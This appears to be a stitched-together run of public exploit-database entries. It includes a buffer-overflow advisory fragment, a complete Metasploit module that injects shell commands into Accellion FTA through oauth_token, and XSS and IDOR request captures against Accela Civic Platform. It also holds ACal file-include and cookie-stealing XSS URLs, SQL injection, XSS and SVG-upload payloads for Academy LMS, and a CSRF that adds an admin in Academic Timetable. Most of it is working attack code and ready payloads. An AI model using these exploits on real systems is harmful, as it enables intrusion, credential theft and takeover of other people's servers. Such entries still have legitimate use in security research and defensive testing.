A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 1272 Prec NEAR,53 Mask 1 1 0 0 1 0
2) Buffer overflow when loading a malicious "Exploit zone file" text file
containing 2080 bytes,
load text file from "Weak History" Menu choose Import "from File" choose
exploit text file and BOOM!
EAX 00000000
ECX 52525242
EDX 7702B4AD ntdll.7702B4AD
EBX 00000000
ESP 0018E940
EBP 0018E960
ESI 00000000
EDI 00000000
EIP 52525242 <----------------- KABOOM
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0
Windbg dump...
(2abc.2330): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=52525252 edx=7702b4ad esi=00000000
edi=00000000
eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0 nv up ei pl zr na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010246
52525252 ?? ???
Disclosure Timeline:
=====================================
Vendor Notification: NA
December 26, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
Med
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Accellion FTA getStatus verify_oauth_token Command Execution',
'Description' => %q{
This module exploits a metacharacter shell injection vulnerability in the Accellion
File Transfer appliance. This vulnerability is triggered when a user-provided
'oauth_token' is passed into a system() call within a mod_perl handler. This
module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include
'/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on
version FTA_9_11_200, but may apply to previous versions as well. This issue was
fixed in software update FTA_9_11_210.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://r-7.co/R7-2015-08'],
['CVE', '2015-2857']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet',
}
},
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 10 2015'
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true])
], self.class)
end
def check
uri = '/tws/getStatus'
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'transaction_id' => rand(0x100000000),
'oauth_token' => 'invalid'
}})
unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/
return Exploit::CheckCode::Safe
end
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'transaction_id' => rand(0x100000000),
'oauth_token' => "';echo '"
}})
unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
return Exploit::CheckCode::Safe
end
Msf::Exploit::CheckCode::Vulnerable
end
def exploit
# The token is embedded into a command line the following:
# `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`;
token = "';#{payload.encoded};echo '"
uri = '/tws/getStatus'
# Other exploitable URLs:
# * /seos/find.api (works with no other changes to this module)
# * /seos/put.api (requires some hoop jumping, upload)
# * /seos/mput.api (requires some hoop jumping, token && upload)
print_status("Sending request for #{uri}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'transaction_id' => rand(0x100000000),
'oauth_token' => token
}})
if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
print_status("Valid response received...")
else
if res
print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
else
print_error("No reply received from the target")
end
end
handler
end
end
# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE-2021-34370
================================================================
Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
================================================================
================================================================
Request Heeaders start
================================================================
GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Heeaders end
================================================================
================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK
Connection: close
Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter
X-XSS-Protection: 0
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 73
Date: Tue, 08 Jun 2021 10:41:59 GMT
<script type='text/javascript'>document.location=''^alert`1`^''</script>
================================================================
Response Heeaders end
================================================================
Payload: %27^alert`1`^%27
for open redirect, replace the payload to a valid website.
# Exploit Title: Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)
# Exploit Author: Abdulazeez Alaseeri
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Tested on: JBoss server/windows
# Type: Web App
# Date: 06/07/2021
# CVE: CVE-2021-33904
================================================================
Accela Civic Platform Cross-Site-Scripting <= 21.1
================================================================
================================================================
Request Heeaders start
================================================================
GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 HTTP/1.1
Host: Hidden for security reasons
Cookie: JSESSIONID=FBjC0Zfg-H87ecWmTMDEcNo8HID1gB6rwBt5QC4Y.civpnode; LASTEST_REQUEST_TIME=1623004368673; g_current_language_ext=en_US; hostSignOn=true; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LATEST_SESSION_ID=lVkV3izKpk9ig1g_nqSktJ3YKjSbfwwdPj0YBFDO; LATEST_WEB_SERVER=1.1.1.1; LATEST_LB=1360578058.47873.0000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Heeaders end
================================================================
================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Cache-Control: no-cache
X-Powered-By: JSP/2.3
Set-Cookie: LASTEST_REQUEST_TIME=1623004478373; path=/; domain=.Hidden for security reasons; secure
Set-Cookie: g_current_language_ext=en_US; path=/; domain=.Hidden for security reasons; secure
Set-Cookie: hostSignOn=true; path=/; domain=.Hidden for security reasons; secure
X-XSS-Protection: 0
Pragma: No-cache
Date: Sun, 06 Jun 2021 18:34:38 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13222
================================================================
Response Heeaders end
================================================================
You can notice that the parameter "servProvCode" is vulnerable to XSS.
Payload: k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9
# Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE: CVE-2021-34369
================================================================
Accela Civic Platform Insecure Direct Object References <= 21.1
================================================================
This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber
================================================================
Request Heeaders start
================================================================
GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Heeaders end
================================================================
================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Powered-By: JSP/2.3
Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure
Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure
Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure
Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure
X-XSS-Protection: 0
Pragma: No-cache
X-UA-Compatible: IE=EDGE
Date: Wed, 09 Jun 2021 04:09:40 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98126
================================================================
Response Heeaders end
================================================================
contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR
source: https://www.securityfocus.com/bid/61801/info
ACal is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input before being used to include files.
An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.
ACal 2.2.6 is vulnerable; other versions may also be affected.
http://www.example.com/calendar/embed/example/example.php?view=../../etc/passwd%00
source: https://www.securityfocus.com/bid/49442/info
ACal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
ACal 2.2.6 is vulnerable; other versions may also be affected.
http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script>
# Exploit Title: Academy-LMS 4.3 - Stored XSS
# Date: 19/12/2020
# Vendor page: https://academy-lms.com/
# Version: 4.3
# Tested on Win10 and Google Chrome
# Exploit Author: Vinicius Alves
# XSS Payload: </script><svg onload=alert();>
1) Access LMS and log in to admin panel
2) Access courses page
3) Open course manager and SEO menu
4) Paste the XSS Payload tag and Submit
5) Access the course page on frontend
6) Trigged!
# Exploit Title: Academy LMS 6.2 - SQL Injection
# Exploit Author: CraCkEr
# Date: 29/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4974
# CWE: CWE-89 / CWE-74 / CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /academy/tutor/filter
GET parameter 'price_min' is vulnerable to SQL Injection
GET parameter 'price_max' is vulnerable to SQL Injection
https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0
---
Parameter: price_min (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0
Parameter: price_max (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0
---
[-] Done
# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 05/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://academylms.net/
# Software Link: https://demo.academylms.net/
# Version: 6.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CWE: CWE-79 - CWE-74 - CWE-707
## Description
Allows Attacker to upload malicious files onto the server, such as Stored XSS
## Steps to Reproduce:
1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
-----------------------------------------------------------
POST /wp-admin/async-upload.php HTTP/2
-----------------------------------------------------------
Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by CraCkEr");
</script>
</svg>
-----------------------------------------------------------
6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg
[-] Done
# Exploit Title: Academy LMS 6.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 22/07/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Version: 6.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4119
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /academy/home/courses
GET parameter 'query' is vulnerable to XSS
https://website/academy/home/courses?query=[XSS]
Path: /academy/home/courses
GET parameter 'sort_by' is vulnerable to XSS
https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]
XSS Payloads (Blocked) :
<script>alert(1)</script>
ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd
XSS Payload Bypass Filter :
cplvz"><img src=a onerror=alert(1)>fk4ap
[-] Done
# Exploit Title: Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://geoffpartridge.net/
# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
# Version: 7.0a-7.0b
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Description
# New admin can be added..
http://192.168.1.27/[PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb
GET [PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 01:10:29 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 910
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
/* `exploitdb`.`ms_user` */
$ms_user = array(
array('use_id' => '1testdb','use_name' => '1testdb','rol_id' => 'ADMIN','pwd' => '*6CC4E8CFFEAF202D7475BC906612F9A29A9C8117')
);
#